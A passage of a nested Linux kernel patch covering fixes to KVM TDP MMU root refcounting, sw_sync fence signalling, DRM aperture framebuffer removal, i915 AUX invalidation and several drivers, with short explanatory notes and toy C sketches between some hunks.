+ 	 * This does not change the actual hardware registers. It just
+ 	 * resets the memory image and sets TIF_NEED_FPU_LOAD so a
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 0bab497c94369..1afbc4866b100 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -882,6 +882,13 @@ void __init fpu__init_system_xstate(unsigned int legacy_size)
+ 		goto out_disable;
+ 	}
+ 
++	/*
++	 * CPU capabilities initialization runs before FPU init. So
++	 * X86_FEATURE_OSXSAVE is not set. Now that XSAVE is completely
++	 * functional, set the feature bit so depending code works.
++	 */
++	setup_force_cpu_cap(X86_FEATURE_OSXSAVE);
++
+ 	print_xstate_offset_size();
+ 	pr_info("x86/fpu: Enabled xstate features 0x%llx, context size is %d bytes, using '%s' format.\n",
+ 		fpu_kernel_cfg.max_features,
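
The added setup_force_cpu_cap() call follows a general init-then-publish rule: advertise a capability bit only once the facility behind it is fully functional. A hedged sketch of that ordering (the flag and init function are stand-ins, not the real cpufeature machinery):

    #include <stdbool.h>
    #include <stdio.h>

    static bool cap_osxsave;        /* stand-in for X86_FEATURE_OSXSAVE */

    static int init_xstate(void)
    {
        /* enable XSAVE, size the state buffers, etc. */
        return 0;                   /* pretend it succeeded */
    }

    int main(void)
    {
        if (init_xstate() == 0)
            cap_osxsave = true;     /* publish only after success */
        printf("OSXSAVE advertised: %d\n", cap_osxsave);
        return 0;
    }
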
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 230108a90cf39..beca03556379d 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -4212,7 +4212,8 @@ static int kvm_faultin_pfn(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault)
+  * root was invalidated by a memslot update or a relevant mmu_notifier fired.
+  */
+ static bool is_page_fault_stale(struct kvm_vcpu *vcpu,
+-				struct kvm_page_fault *fault, int mmu_seq)
++				struct kvm_page_fault *fault,
++				unsigned long mmu_seq)
+ {
+ 	struct kvm_mmu_page *sp = to_shadow_page(vcpu->arch.mmu->root.hpa);
+ 
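
The type change above matters because mmu_seq snapshots an unsigned long counter; narrowing it to int can make a genuinely stale snapshot compare equal after truncation. A few lines of C show the failure mode:

    #include <stdio.h>

    int main(void)
    {
        unsigned long seq = 0x100000000UL;  /* low 32 bits are zero */
        int truncated = (int)seq;           /* the old parameter type */
        printf("full=%#lx truncated=%d matches-zero=%d\n",
               seq, truncated, truncated == 0);
        return 0;
    }
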
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 672f0432d7777..70945f00ec412 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -51,7 +51,17 @@ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ 	if (!kvm->arch.tdp_mmu_enabled)
+ 		return;
+ 
+-	/* Also waits for any queued work items.  */
++	/*
++	 * Invalidate all roots, which besides the obvious, schedules all roots
++	 * for zapping and thus puts the TDP MMU's reference to each root, i.e.
++	 * ultimately frees all roots.
++	 */
++	kvm_tdp_mmu_invalidate_all_roots(kvm);
++
++	/*
++	 * Destroying a workqueue also first flushes the workqueue, i.e. no
++	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
++	 */
+ 	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
+ 
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_pages));
+@@ -127,16 +137,6 @@ static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root
+ 	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+ }
+ 
+-static inline bool kvm_tdp_root_mark_invalid(struct kvm_mmu_page *page)
+-{
+-	union kvm_mmu_page_role role = page->role;
+-	role.invalid = true;
+-
+-	/* No need to use cmpxchg, only the invalid bit can change.  */
+-	role.word = xchg(&page->role.word, role.word);
+-	return role.invalid;
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -145,45 +145,12 @@ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 	if (!refcount_dec_and_test(&root->tdp_mmu_root_count))
+ 		return;
+ 
+-	WARN_ON(!root->tdp_mmu_page);
+-
+ 	/*
+-	 * The root now has refcount=0.  It is valid, but readers already
+-	 * cannot acquire a reference to it because kvm_tdp_mmu_get_root()
+-	 * rejects it.  This remains true for the rest of the execution
+-	 * of this function, because readers visit valid roots only
+-	 * (except for tdp_mmu_zap_root_work(), which however
+-	 * does not acquire any reference itself).
+-	 *
+-	 * Even though there are flows that need to visit all roots for
+-	 * correctness, they all take mmu_lock for write, so they cannot yet
+-	 * run concurrently. The same is true after kvm_tdp_root_mark_invalid,
+-	 * since the root still has refcount=0.
+-	 *
+-	 * However, tdp_mmu_zap_root can yield, and writers do not expect to
+-	 * see refcount=0 (see for example kvm_tdp_mmu_invalidate_all_roots()).
+-	 * So the root temporarily gets an extra reference, going to refcount=1
+-	 * while staying invalid.  Readers still cannot acquire any reference;
+-	 * but writers are now allowed to run if tdp_mmu_zap_root yields and
+-	 * they might take an extra reference if they themselves yield.
+-	 * Therefore, when the reference is given back by the worker,
+-	 * there is no guarantee that the refcount is still 1.  If not, whoever
+-	 * puts the last reference will free the page, but they will not have to
+-	 * zap the root because a root cannot go from invalid to valid.
++	 * The TDP MMU itself holds a reference to each root until the root is
++	 * explicitly invalidated, i.e. the final reference should never be
++	 * put for a valid root.
+ 	 */
+-	if (!kvm_tdp_root_mark_invalid(root)) {
+-		refcount_set(&root->tdp_mmu_root_count, 1);
+-
+-		/*
+-		 * Zapping the root in a worker is not just "nice to have";
+-		 * it is required because kvm_tdp_mmu_invalidate_all_roots()
+-		 * skips already-invalid roots.  If kvm_tdp_mmu_put_root() did
+-		 * not add the root to the workqueue, kvm_tdp_mmu_zap_all_fast()
+-		 * might return with some roots not zapped yet.
+-		 */
+-		tdp_mmu_schedule_zap_root(kvm, root);
+-		return;
+-	}
++	KVM_BUG_ON(!is_tdp_mmu_page(root) || !root->role.invalid, kvm);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_del_rcu(&root->link);
+@@ -329,7 +296,14 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	root = tdp_mmu_alloc_sp(vcpu);
+ 	tdp_mmu_init_sp(root, NULL, 0, role);
+ 
+-	refcount_set(&root->tdp_mmu_root_count, 1);
++	/*
++	 * TDP MMU roots are kept until they are explicitly invalidated, either
++	 * by a memslot update or by the destruction of the VM.  Initialize the
++	 * refcount to two; one reference for the vCPU, and one reference for
++	 * the TDP MMU itself, which is held until the root is invalidated and
++	 * is ultimately put by tdp_mmu_zap_root_work().
++	 */
++	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_add_rcu(&root->link, &kvm->arch.tdp_mmu_roots);
+@@ -1027,32 +1001,49 @@ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously, so a reference is taken on all roots.
+- * Using a separate workqueue makes it easy to ensure that the destruction is
+- * performed before the "fast zap" completes, without keeping a separate list
+- * of invalidated roots; the list is effectively the list of work items in
+- * the workqueue.
+- *
+- * Get a reference even if the root is already invalid, the asynchronous worker
+- * assumes it was gifted a reference to the root it processes.  Because mmu_lock
+- * is held for write, it should be impossible to observe a root with zero refcount,
+- * i.e. the list of roots cannot be stale.
++ * zapping is performed asynchronously.  Using a separate workqueue makes it
++ * easy to ensure that the destruction is performed before the "fast zap"
++ * completes, without keeping a separate list of invalidated roots; the list is
++ * effectively the list of work items in the workqueue.
+  *
+- * This has essentially the same effect for the TDP MMU
+- * as updating mmu_valid_gen does for the shadow MMU.
++ * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	lockdep_assert_held_write(&kvm->mmu_lock);
+-	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
+-		if (!root->role.invalid &&
+-		    !WARN_ON_ONCE(!kvm_tdp_mmu_get_root(root))) {
++	/*
++	 * mmu_lock must be held for write to ensure that a root doesn't become
++	 * invalid while there are active readers (invalidating a root while
++	 * there are active readers may or may not be problematic in practice,
++	 * but it's uncharted territory and not supported).
++	 *
++	 * Waive the assertion if there are no users of @kvm, i.e. the VM is
++	 * being destroyed after all references have been put, or if no vCPUs
++	 * have been created (which means there are no roots), i.e. the VM is
++	 * being destroyed in an error path of KVM_CREATE_VM.
++	 */
++	if (IS_ENABLED(CONFIG_PROVE_LOCKING) &&
++	    refcount_read(&kvm->users_count) && kvm->created_vcpus)
++		lockdep_assert_held_write(&kvm->mmu_lock);
++
++	/*
++	 * As above, mmu_lock isn't held when destroying the VM!  There can't
++	 * be other references to @kvm, i.e. nothing else can invalidate roots
++	 * or be consuming roots, but walking the list of roots does need to be
++	 * guarded against roots being deleted by the asynchronous zap worker.
++	 */
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++		if (!root->role.invalid) {
+ 			root->role.invalid = true;
+ 			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
++
++	rcu_read_unlock();
+ }
+ 
+ /*
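
The net effect of this hunk set: a root is born with refcount 2 (one reference for the vCPU, one held by the TDP MMU itself) and the MMU's reference is only put after explicit invalidation, so a valid root can never hit refcount 0. A toy model of that lifetime (plain counters standing in for refcount_t):

    #include <stdio.h>

    struct root { int refcount; int invalid; };

    static void put_root(struct root *r)
    {
        if (--r->refcount == 0)
            printf("freed (invalid=%d, must be 1)\n", r->invalid);
    }

    int main(void)
    {
        struct root r = { .refcount = 2 };  /* vCPU ref + MMU ref */

        put_root(&r);       /* vCPU drops its ref: root survives */
        r.invalid = 1;      /* memslot update invalidates the root... */
        put_root(&r);       /* ...then the MMU puts the final ref */
        return 0;
    }
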
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4459cfbdbcb18..c2f0f74193f0e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1223,9 +1223,6 @@ static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+ 			ub_cmd->result);
+ 
+-	if (!(issue_flags & IO_URING_F_SQE128))
+-		goto out;
+-
+ 	if (ub_cmd->q_id >= ub->dev_info.nr_hw_queues)
+ 		goto out;
+ 
+diff --git a/drivers/clk/clk-devres.c b/drivers/clk/clk-devres.c
+index 4fb4fd4b06bda..737aa70e2cb3d 100644
+--- a/drivers/clk/clk-devres.c
++++ b/drivers/clk/clk-devres.c
+@@ -205,18 +205,19 @@ EXPORT_SYMBOL(devm_clk_put);
+ struct clk *devm_get_clk_from_child(struct device *dev,
+ 				    struct device_node *np, const char *con_id)
+ {
+-	struct clk **ptr, *clk;
++	struct devm_clk_state *state;
++	struct clk *clk;
+ 
+-	ptr = devres_alloc(devm_clk_release, sizeof(*ptr), GFP_KERNEL);
+-	if (!ptr)
++	state = devres_alloc(devm_clk_release, sizeof(*state), GFP_KERNEL);
++	if (!state)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	clk = of_clk_get_by_name(np, con_id);
+ 	if (!IS_ERR(clk)) {
+-		*ptr = clk;
+-		devres_add(dev, ptr);
++		state->clk = clk;
++		devres_add(dev, state);
+ 	} else {
+-		devres_free(ptr);
++		devres_free(state);
+ 	}
+ 
+ 	return clk;
+diff --git a/drivers/dma-buf/sw_sync.c b/drivers/dma-buf/sw_sync.c
+index 348b3a9170fa4..7f5ed1aa7a9f8 100644
+--- a/drivers/dma-buf/sw_sync.c
++++ b/drivers/dma-buf/sw_sync.c
+@@ -191,6 +191,7 @@ static const struct dma_fence_ops timeline_fence_ops = {
+  */
+ static void sync_timeline_signal(struct sync_timeline *obj, unsigned int inc)
+ {
++	LIST_HEAD(signalled);
+ 	struct sync_pt *pt, *next;
+ 
+ 	trace_sync_timeline(obj);
+@@ -203,21 +204,20 @@ static void sync_timeline_signal(struct sync_timeline *obj, unsigned int inc)
+ 		if (!timeline_fence_signaled(&pt->base))
+ 			break;
+ 
+-		list_del_init(&pt->link);
++		dma_fence_get(&pt->base);
++
++		list_move_tail(&pt->link, &signalled);
+ 		rb_erase(&pt->node, &obj->pt_tree);
+ 
+-		/*
+-		 * A signal callback may release the last reference to this
+-		 * fence, causing it to be freed. That operation has to be
+-		 * last to avoid a use after free inside this loop, and must
+-		 * be after we remove the fence from the timeline in order to
+-		 * prevent deadlocking on timeline->lock inside
+-		 * timeline_fence_release().
+-		 */
+ 		dma_fence_signal_locked(&pt->base);
+ 	}
+ 
+ 	spin_unlock_irq(&obj->lock);
++
++	list_for_each_entry_safe(pt, next, &signalled, link) {
++		list_del_init(&pt->link);
++		dma_fence_put(&pt->base);
++	}
+ }
+ 
+ /**
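
The sw_sync fix is an instance of a common locking pattern: pin each object with a temporary reference, move it to a private list while still under the lock, and drop the references only after the lock is released, so a release callback can neither free an object mid-walk nor deadlock on the timeline lock. A compact sketch (single fence, fake lock boundaries in comments):

    #include <stdio.h>

    struct fence { int refs; };

    static void get(struct fence *f) { f->refs++; }
    static void put(struct fence *f)
    {
        if (--f->refs == 0)
            printf("released with no lock held\n");
    }

    int main(void)
    {
        struct fence f = { .refs = 1 };     /* timeline's reference */

        /* --- under the timeline lock --- */
        get(&f);    /* pin: a signal callback may drop the last user ref */
        put(&f);    /* the callback's put happens during signalling */
        /* unlink from the tree, move to a local 'signalled' list */
        /* --- lock dropped --- */

        put(&f);    /* deferred put: the last ref dies safely here */
        return 0;
    }
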
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index fef12e57b1f13..b352775e5e0b8 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -290,6 +290,15 @@ static void gpio_sim_mutex_destroy(void *data)
+ 	mutex_destroy(lock);
+ }
+ 
++static void gpio_sim_dispose_mappings(void *data)
++{
++	struct gpio_sim_chip *chip = data;
++	unsigned int i;
++
++	for (i = 0; i < chip->gc.ngpio; i++)
++		irq_dispose_mapping(irq_find_mapping(chip->irq_sim, i));
++}
++
+ static void gpio_sim_sysfs_remove(void *data)
+ {
+ 	struct gpio_sim_chip *chip = data;
+@@ -398,10 +407,14 @@ static int gpio_sim_add_bank(struct fwnode_handle *swnode, struct device *dev)
+ 	if (!chip->pull_map)
+ 		return -ENOMEM;
+ 
+-	chip->irq_sim = devm_irq_domain_create_sim(dev, NULL, num_lines);
++	chip->irq_sim = devm_irq_domain_create_sim(dev, swnode, num_lines);
+ 	if (IS_ERR(chip->irq_sim))
+ 		return PTR_ERR(chip->irq_sim);
+ 
++	ret = devm_add_action_or_reset(dev, gpio_sim_dispose_mappings, chip);
++	if (ret)
++		return ret;
++
+ 	mutex_init(&chip->lock);
+ 	ret = devm_add_action_or_reset(dev, gpio_sim_mutex_destroy,
+ 				       &chip->lock);
+diff --git a/drivers/gpu/drm/arm/hdlcd_drv.c b/drivers/gpu/drm/arm/hdlcd_drv.c
+index a032003c340cc..d6ea47873627f 100644
+--- a/drivers/gpu/drm/arm/hdlcd_drv.c
++++ b/drivers/gpu/drm/arm/hdlcd_drv.c
+@@ -290,7 +290,7 @@ static int hdlcd_drm_bind(struct device *dev)
+ 	 */
+ 	if (hdlcd_read(hdlcd, HDLCD_REG_COMMAND)) {
+ 		hdlcd_write(hdlcd, HDLCD_REG_COMMAND, 0);
+-		drm_aperture_remove_framebuffers(false, &hdlcd_driver);
++		drm_aperture_remove_framebuffers(&hdlcd_driver);
+ 	}
+ 
+ 	drm_mode_config_reset(drm);
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 142668cd6d7cd..688ba358f5319 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -95,7 +95,7 @@ static int armada_drm_bind(struct device *dev)
+ 	}
+ 
+ 	/* Remove early framebuffers */
+-	ret = drm_aperture_remove_framebuffers(false, &armada_drm_driver);
++	ret = drm_aperture_remove_framebuffers(&armada_drm_driver);
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+diff --git a/drivers/gpu/drm/ast/ast_drv.c b/drivers/gpu/drm/ast/ast_drv.c
+index b9392f31e6291..800471f2a2037 100644
+--- a/drivers/gpu/drm/ast/ast_drv.c
++++ b/drivers/gpu/drm/ast/ast_drv.c
+@@ -89,27 +89,13 @@ static const struct pci_device_id ast_pciidlist[] = {
+ 
+ MODULE_DEVICE_TABLE(pci, ast_pciidlist);
+ 
+-static int ast_remove_conflicting_framebuffers(struct pci_dev *pdev)
+-{
+-	bool primary = false;
+-	resource_size_t base, size;
+-
+-	base = pci_resource_start(pdev, 0);
+-	size = pci_resource_len(pdev, 0);
+-#ifdef CONFIG_X86
+-	primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+-#endif
+-
+-	return drm_aperture_remove_conflicting_framebuffers(base, size, primary, &ast_driver);
+-}
+-
+ static int ast_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ {
+ 	struct ast_private *ast;
+ 	struct drm_device *dev;
+ 	int ret;
+ 
+-	ret = ast_remove_conflicting_framebuffers(pdev);
++	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &ast_driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/drm_aperture.c b/drivers/gpu/drm/drm_aperture.c
+index 3b8fdeeafd53a..697cffbfd6037 100644
+--- a/drivers/gpu/drm/drm_aperture.c
++++ b/drivers/gpu/drm/drm_aperture.c
+@@ -32,17 +32,13 @@
+  *
+  *	static int remove_conflicting_framebuffers(struct pci_dev *pdev)
+  *	{
+- *		bool primary = false;
+  *		resource_size_t base, size;
+  *		int ret;
+  *
+  *		base = pci_resource_start(pdev, 0);
+  *		size = pci_resource_len(pdev, 0);
+- *	#ifdef CONFIG_X86
+- *		primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+- *	#endif
+  *
+- *		return drm_aperture_remove_conflicting_framebuffers(base, size, primary,
++ *		return drm_aperture_remove_conflicting_framebuffers(base, size,
+  *		                                                    &example_driver);
+  *	}
+  *
+@@ -161,7 +157,6 @@ EXPORT_SYMBOL(devm_aperture_acquire_from_firmware);
+  * drm_aperture_remove_conflicting_framebuffers - remove existing framebuffers in the given range
+  * @base: the aperture's base address in physical memory
+  * @size: aperture size in bytes
+- * @primary: also kick vga16fb if present
+  * @req_driver: requesting DRM driver
+  *
+  * This function removes graphics device drivers which use the memory range described by
+@@ -171,9 +166,9 @@ EXPORT_SYMBOL(devm_aperture_acquire_from_firmware);
+  * 0 on success, or a negative errno code otherwise
+  */
+ int drm_aperture_remove_conflicting_framebuffers(resource_size_t base, resource_size_t size,
+-						 bool primary, const struct drm_driver *req_driver)
++						 const struct drm_driver *req_driver)
+ {
+-	return aperture_remove_conflicting_devices(base, size, primary, req_driver->name);
++	return aperture_remove_conflicting_devices(base, size, false, req_driver->name);
+ }
+ EXPORT_SYMBOL(drm_aperture_remove_conflicting_framebuffers);
+ 
+diff --git a/drivers/gpu/drm/gma500/psb_drv.c b/drivers/gpu/drm/gma500/psb_drv.c
+index cd9c73f5a64ab..738eb558a97e9 100644
+--- a/drivers/gpu/drm/gma500/psb_drv.c
++++ b/drivers/gpu/drm/gma500/psb_drv.c
+@@ -424,12 +424,17 @@ static int psb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/*
+ 	 * We cannot yet easily find the framebuffer's location in memory. So
+-	 * remove all framebuffers here.
++	 * remove all framebuffers here. Note that we still want the pci special
++	 * handling to kick out vgacon.
+ 	 *
+ 	 * TODO: Refactor psb_driver_load() to map vdc_reg earlier. Then we
+ 	 *       might be able to read the framebuffer range from the device.
+ 	 */
+-	ret = drm_aperture_remove_framebuffers(true, &driver);
++	ret = drm_aperture_remove_framebuffers(&driver);
++	if (ret)
++		return ret;
++
++	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+index ca127ff797f75..29ee0814bccc8 100644
+--- a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
++++ b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+@@ -74,7 +74,6 @@ static int hyperv_setup_vram(struct hyperv_drm_device *hv,
+ 
+ 	drm_aperture_remove_conflicting_framebuffers(screen_info.lfb_base,
+ 						     screen_info.lfb_size,
+-						     false,
+ 						     &hyperv_driver);
+ 
+ 	hv->fb_size = (unsigned long)hv->mmio_megabytes * 1024 * 1024;
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index b2838732ac936..cc84685368715 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -165,14 +165,60 @@ static u32 preparser_disable(bool state)
+ 	return MI_ARB_CHECK | 1 << 8 | state;
+ }
+ 
+-u32 *gen12_emit_aux_table_inv(struct intel_gt *gt, u32 *cs, const i915_reg_t inv_reg)
++static i915_reg_t gen12_get_aux_inv_reg(struct intel_engine_cs *engine)
+ {
+-	u32 gsi_offset = gt->uncore->gsi_offset;
++	switch (engine->id) {
++	case RCS0:
++		return GEN12_CCS_AUX_INV;
++	case BCS0:
++		return GEN12_BCS0_AUX_INV;
++	case VCS0:
++		return GEN12_VD0_AUX_INV;
++	case VCS2:
++		return GEN12_VD2_AUX_INV;
++	case VECS0:
++		return GEN12_VE0_AUX_INV;
++	case CCS0:
++		return GEN12_CCS0_AUX_INV;
++	default:
++		return INVALID_MMIO_REG;
++	}
++}
++
++static bool gen12_needs_ccs_aux_inv(struct intel_engine_cs *engine)
++{
++	i915_reg_t reg = gen12_get_aux_inv_reg(engine);
++
++	if (IS_PONTEVECCHIO(engine->i915))
++		return false;
++
++	/*
++	 * So far, the platforms supported by i915 that have flat CCS do not
++	 * require AUX invalidation. Also check whether this engine needs it.
++	 */
++	return i915_mmio_reg_valid(reg) && !HAS_FLAT_CCS(engine->i915);
++}
++
++u32 *gen12_emit_aux_table_inv(struct intel_engine_cs *engine, u32 *cs)
++{
++	i915_reg_t inv_reg = gen12_get_aux_inv_reg(engine);
++	u32 gsi_offset = engine->gt->uncore->gsi_offset;
++
++	if (!gen12_needs_ccs_aux_inv(engine))
++		return cs;
+ 
+ 	*cs++ = MI_LOAD_REGISTER_IMM(1) | MI_LRI_MMIO_REMAP_EN;
+ 	*cs++ = i915_mmio_reg_offset(inv_reg) + gsi_offset;
+ 	*cs++ = AUX_INV;
+-	*cs++ = MI_NOOP;
++
++	*cs++ = MI_SEMAPHORE_WAIT_TOKEN |
++		MI_SEMAPHORE_REGISTER_POLL |
++		MI_SEMAPHORE_POLL |
++		MI_SEMAPHORE_SAD_EQ_SDD;
++	*cs++ = 0;
++	*cs++ = i915_mmio_reg_offset(inv_reg) + gsi_offset;
++	*cs++ = 0;
++	*cs++ = 0;
+ 
+ 	return cs;
+ }
+@@ -181,7 +227,11 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ {
+ 	struct intel_engine_cs *engine = rq->engine;
+ 
+-	if (mode & EMIT_FLUSH) {
++	/*
++	 * On Aux CCS platforms the invalidation of the Aux
++	 * table requires quiescing memory traffic beforehand
++	 */
++	if (mode & EMIT_FLUSH || gen12_needs_ccs_aux_inv(engine)) {
+ 		u32 flags = 0;
+ 		u32 *cs;
+ 
+@@ -236,10 +286,9 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 		else if (engine->class == COMPUTE_CLASS)
+ 			flags &= ~PIPE_CONTROL_3D_ENGINE_FLAGS;
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915))
+-			count = 8 + 4;
+-		else
+-			count = 8;
++		count = 8;
++		if (gen12_needs_ccs_aux_inv(rq->engine))
++			count += 8;
+ 
+ 		cs = intel_ring_begin(rq, count);
+ 		if (IS_ERR(cs))
+@@ -254,11 +303,7 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ 		cs = gen8_emit_pipe_control(cs, flags, LRC_PPHWSP_SCRATCH_ADDR);
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915)) {
+-			/* hsdes: 1809175790 */
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt, cs,
+-						      GEN12_CCS_AUX_INV);
+-		}
++		cs = gen12_emit_aux_table_inv(engine, cs);
+ 
+ 		*cs++ = preparser_disable(false);
+ 		intel_ring_advance(rq, cs);
+@@ -269,21 +314,14 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ {
+-	intel_engine_mask_t aux_inv = 0;
+-	u32 cmd, *cs;
++	u32 cmd = 4;
++	u32 *cs;
+ 
+-	cmd = 4;
+ 	if (mode & EMIT_INVALIDATE) {
+ 		cmd += 2;
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915) &&
+-		    (rq->engine->class == VIDEO_DECODE_CLASS ||
+-		     rq->engine->class == VIDEO_ENHANCEMENT_CLASS)) {
+-			aux_inv = rq->engine->mask &
+-				~GENMASK(_BCS(I915_MAX_BCS - 1), BCS0);
+-			if (aux_inv)
+-				cmd += 4;
+-		}
++		if (gen12_needs_ccs_aux_inv(rq->engine))
++			cmd += 8;
+ 	}
+ 
+ 	cs = intel_ring_begin(rq, cmd);
+@@ -314,14 +352,7 @@ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ 	*cs++ = 0; /* upper addr */
+ 	*cs++ = 0; /* value */
+ 
+-	if (aux_inv) { /* hsdes: 1809175790 */
+-		if (rq->engine->class == VIDEO_DECODE_CLASS)
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VD0_AUX_INV);
+-		else
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VE0_AUX_INV);
+-	}
++	cs = gen12_emit_aux_table_inv(rq->engine, cs);
+ 
+ 	if (mode & EMIT_INVALIDATE)
+ 		*cs++ = preparser_disable(false);
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.h b/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
+index e4d24c811dd61..651eb786e930c 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
+@@ -13,6 +13,7 @@
+ #include "intel_gt_regs.h"
+ #include "intel_gpu_commands.h"
+ 
++struct intel_engine_cs;
+ struct intel_gt;
+ struct i915_request;
+ 
+@@ -46,7 +47,7 @@ u32 *gen8_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ u32 *gen11_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ u32 *gen12_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ 
+-u32 *gen12_emit_aux_table_inv(struct intel_gt *gt, u32 *cs, const i915_reg_t inv_reg);
++u32 *gen12_emit_aux_table_inv(struct intel_engine_cs *engine, u32 *cs);
+ 
+ static inline u32 *
+ __gen8_emit_pipe_control(u32 *batch, u32 flags0, u32 flags1, u32 offset)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gpu_commands.h b/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
+index d4e9702d3c8e7..25ea5f8a464a4 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
++++ b/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
+@@ -120,6 +120,7 @@
+ #define   MI_SEMAPHORE_TARGET(engine)	((engine)<<15)
+ #define MI_SEMAPHORE_WAIT	MI_INSTR(0x1c, 2) /* GEN8+ */
+ #define MI_SEMAPHORE_WAIT_TOKEN	MI_INSTR(0x1c, 3) /* GEN12+ */
++#define   MI_SEMAPHORE_REGISTER_POLL	(1 << 16)
+ #define   MI_SEMAPHORE_POLL		(1 << 15)
+ #define   MI_SEMAPHORE_SAD_GT_SDD	(0 << 12)
+ #define   MI_SEMAPHORE_SAD_GTE_SDD	(1 << 12)
+diff --git a/drivers/gpu/drm/i915/gt/intel_lrc.c b/drivers/gpu/drm/i915/gt/intel_lrc.c
+index 137e41e37ea54..7eb01ff17d89b 100644
+--- a/drivers/gpu/drm/i915/gt/intel_lrc.c
++++ b/drivers/gpu/drm/i915/gt/intel_lrc.c
+@@ -1296,10 +1296,7 @@ gen12_emit_indirect_ctx_rcs(const struct intel_context *ce, u32 *cs)
+ 	    IS_DG2_G11(ce->engine->i915))
